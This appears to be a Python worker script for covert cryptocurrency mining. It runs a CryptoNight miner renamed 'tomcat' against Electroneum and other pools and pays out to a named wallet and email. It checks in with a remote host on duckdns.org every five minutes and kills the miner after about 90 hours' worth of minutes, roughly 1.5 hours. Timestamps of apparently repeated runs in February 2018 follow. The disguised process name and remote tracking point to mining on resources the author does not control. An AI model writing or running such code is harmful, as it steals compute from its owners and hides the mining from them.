import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:08:07.298801
#2018-02-17 15:55:04.364997
#2018-02-17 17:43:04.666170
#2018-02-17 19:29:04.796532
#2018-02-17 21:18:07.176076
#2018-02-17 23:02:05.059872
#2018-02-18 00:49:05.244891
#2018-02-18 02:36:06.613098
#2018-02-18 04:23:03.756906
#2018-02-18 06:14:01.761358
#2018-02-18 08:03:06.486095
#2018-02-18 09:51:03.734988
#2018-02-18 11:38:02.200314
#2018-02-18 13:23:04.896675
#2018-02-18 15:13:06.262552
#2018-02-18 17:02:01.341120
#2018-02-18 18:49:02.183430
#2018-02-18 20:35:05.860426
#2018-02-18 22:21:05.704119
#2018-02-19 00:11:01.371715
#2018-02-19 01:57:01.358167
#2018-02-19 03:44:07.186345
#2018-02-19 05:29:03.977440
#2018-02-19 07:17:01.921755
#2018-02-19 09:06:06.392413
#2018-02-19 10:54:04.647755
#2018-02-19 12:43:01.734806
#2018-02-19 14:29:05.567465
#2018-02-19 16:17:04.879532
#2018-02-19 18:03:07.319208
#2018-02-19 19:51:07.738379
#2018-02-19 21:40:04.073780
#2018-02-19 23:26:01.890390
#2018-02-20 01:11:05.796165
#2018-02-20 03:01:01.836494
#2018-02-20 04:47:06.261276
#2018-02-20 06:31:06.539494
#2018-02-20 08:17:05.260358
#2018-02-20 10:02:06.208137
#2018-02-20 11:46:06.012082
#2018-02-20 13:33:01.727330
#2018-02-20 15:17:05.418528
#2018-02-20 17:02:01.608347
#2018-02-20 18:49:04.597003
#2018-02-20 20:40:07.120101
#2018-02-20 22:25:09.368697
#2018-02-21 00:06:01.789194
#2018-02-21 01:50:09.769635
#2018-02-21 03:39:01.828117
#2018-02-21 05:27:06.457883
#2018-02-21 07:16:03.687642
#2018-02-21 09:01:04.271678
#2018-02-21 10:49:10.010468
#2018-02-21 12:37:06.470443
#2018-02-21 14:23:06.788991
#2018-02-21 16:11:07.389054
#2018-02-21 18:01:01.215514
#2018-02-21 19:49:06.254677
#2018-02-21 21:35:07.694636
#2018-02-21 23:22:06.825944
#2018-02-22 01:10:09.819080
#2018-02-22 02:57:05.615246
#2018-02-22 04:43:06.260785
#2018-02-22 06:29:07.903831
#2018-02-22 08:16:07.564618
#2018-02-22 10:05:01.417634
#2018-02-22 11:49:12.354149
#2018-02-22 13:36:01.875465
#2018-02-22 15:24:10.212917
#2018-02-22 17:11:07.322616
#2018-02-22 18:56:10.921240
#2018-02-22 20:48:07.540161
#2018-02-22 22:33:01.346100
#2018-02-23 00:22:07.770369
#2018-02-23 02:11:03.855879
#2018-02-23 03:59:05.690110
#2018-02-23 05:45:06.575953
#2018-02-23 07:34:07.341264
#2018-02-23 09:37:07.057570
#2018-02-23 11:41:11.231435
#2018-02-23 13:31:06.016896
#2018-02-23 15:17:02.217135
#2018-02-23 17:05:08.547676
#2018-02-23 18:52:07.592197
#2018-02-23 20:38:04.693654
#2018-02-23 22:25:05.502050
#2018-02-24 00:09:06.101609
#2018-02-24 02:01:01.450941
#2018-02-24 03:52:03.256124
#2018-02-24 05:39:03.897662
#2018-02-24 07:31:07.182046
#2018-02-24 09:18:02.148066
#2018-02-24 11:04:05.526925
#2018-02-24 12:53:03.438375
#2018-02-24 14:41:06.923811
#2018-02-24 16:32:08.108109
#2018-02-24 18:23:01.812125
#2018-02-24 20:10:03.984980
#2018-02-24 21:54:04.152452
#2018-02-25 01:51:07.755276
#2018-02-25 04:55:07.482886
#2018-02-25 09:21:01.410045